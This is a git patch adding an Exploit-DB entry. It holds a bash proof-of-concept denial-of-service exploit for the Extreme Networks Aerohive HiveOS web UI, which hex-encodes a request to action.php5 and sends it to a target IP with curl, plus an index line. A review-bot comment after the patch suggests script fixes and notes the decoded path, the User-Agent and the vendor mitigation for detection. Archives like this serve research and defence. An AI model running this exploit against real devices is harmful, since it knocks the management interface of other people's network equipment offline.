From 262c9c3eb6d4de853193d11bc475a64e6bd7b092 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 9 May 2020 05:01:48 +0000
Subject: [PATCH] DB: 2020-05-09 1 changes to exploits/shellcodes Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
---
 exploits/hardware/dos/48441.sh | 69 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 70 insertions(+)
 create mode 100755 exploits/hardware/dos/48441.sh
diff --git a/exploits/hardware/dos/48441.sh b/exploits/hardware/dos/48441.sh
new file mode 100755
index 000000000..1f79f5da5
--- /dev/null
+++ b/exploits/hardware/dos/48441.sh
@@ -0,0 +1,69 @@
+# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
+# Exploit Author : LiquidWorm
+# Date : 2020-05-06
+# Vendor: Extreme Networks
+# Product web page: https://www.extremenetworks.com
+# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
+# Affected version: <=11.x
+
+#!/bin/bash
+#
+#
+# Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit
+#
+#
+# Vendor: Extreme Networks
+# Product web page: https://www.extremenetworks.com
+# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
+# Affected version: <=11.x
+#
+# Summary: Aerohive HiveOS is the network operating system that powers
+# all Aerohive access points, based on a feature-rich Cooperative Control
+# architecture. HiveOS enables Aerohive devices to organize into groups,
+# or 'hives', which allows functionality like fast roaming, user-based
+# access control and fully stateful application-aware firewall policies,
+# as well as additional security and RF networking features - all without
+# the need for a centralized or dedicated controller.
+#
+# Desc: An unauthenticated malicious user can trigger a Denial of Service
+# (DoS) attack when sending specific application layer packets towards the
+# Aerohive NetConfig UI. This PoC exploit renders the application unusable
+# for 305 seconds or 5 minutes with a single HTTP request using the action.php5
+# script calling the CliWindow function thru the _page parameter, denying
+# access to the web server hive user interface.
+#
+# Vendor mitigation:
+# CLI> no system web-server hive-ui enable
+#
+# Tested on: Hiawatha v9.6
+#
+#
+# Vulnerability discvered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5566
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php
+#
+#
+# 05.12.2019
+#
+
+if [ "$#" -ne 1 ]; then
+ echo -ne "\nUsage: $0 [ipaddr]\n\n"
+ exit
+fi
+
+IP=$1
+
+SBYTES=`echo -e \
+"\x61\x63\x74\x69\x6f\x6e\x2e"\
+"\x70\x68\x70\x35\x3f\x5f\x70"\
+"\x61\x67\x65\x3d\x43\x6c\x69"\
+"\x57\x69\x6e\x64\x6f\x77\x26"\
+"\x5f\x61\x63\x74\x69\x6f\x6e"\
+"\x3d\x67\x65\x74\x26\x5f\x61"\
+"\x63\x74\x69\x6f\x6e\x54\x79"\
+"\x70\x65\x3d\x31"`##_000000251
+
+curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ce1992889..34f4a6cc6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6731,6 +6731,7 @@ id,file,description,date,author,type,platform,port
 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
 48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
+48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
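Review bot: The `#!/bin/bash` line lands on line 9 of the new file 48441.sh, below the metadata comments, so it is only a comment and the script runs under whichever shell launches it; `echo -e` and `echo -ne` behave differently across shells, so the decoded `SBYTES` value is not guaranteed. Put the shebang on line 1 and end the usage branch with `exit 1` instead of the bare `exit`, which currently returns 0 on a usage error. The hex-escaped `SBYTES` also hides the request from a reader; a plain comment beside it, `# decodes to: action.php5?_page=CliWindow&_action=get&_actionType=1`, would document it and give defenders the path to look for in web-server logs, alongside the fixed `Profesorke/Dzvoneshe` User-Agent. The header already names the vendor mitigation (`no system web-server hive-ui enable`), which is worth keeping next to any detection built from this entry.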